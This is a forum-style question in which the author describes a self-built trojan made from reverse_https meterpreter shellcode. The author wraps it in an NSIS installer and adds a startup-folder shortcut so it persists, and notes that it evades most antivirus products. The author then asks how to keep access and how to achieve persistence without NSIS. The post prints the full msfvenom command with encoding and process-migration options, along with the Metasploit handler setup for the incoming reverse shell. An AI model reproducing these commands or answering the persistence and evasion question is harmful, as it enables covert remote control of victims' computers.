So I've created an .exe using reverse_https meterpreter shell code and it's undetectable. However, all of meterpreter's persistence methods resulted in the AV going off, so I decided to use NSIS to make an installer for my trojan. This does get detected by a few AVs, but it's as close to undetectable as I could get and still have persistence. It copies the .exe somewhere else and creates a shortcut in the user's startup folder so that the .exe is run upon sign in. However, meterpreter does not start a when the session is lost, and upon sign-in, nothing happens. The old session is still open, but unresponsive. I know that the .exe is run upon log-in because when I manually close the session, and then listen, it will pick up a new session.
How do I maintain access by using the shortcut method? Also, is there a better way to maintain persistence without NSIS? Using NSIS seems silly. I want the .exe to immediately have persistence without connecting back and then have metasploit tell it to do something.
Here is the shell code that I'm using:
msfvenom -p windows/meterpreter/reverse_https lhost=xxxx lport=xxxx PrepenMigrate=true PrependMigrateProc=svhost.exe -b '\x00\xff' -e x86/shikata_ga_nai -i 3 -f c
This is what I type when I start metasploit on Kali:
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set SessionCommunicationTimeout 0
exploit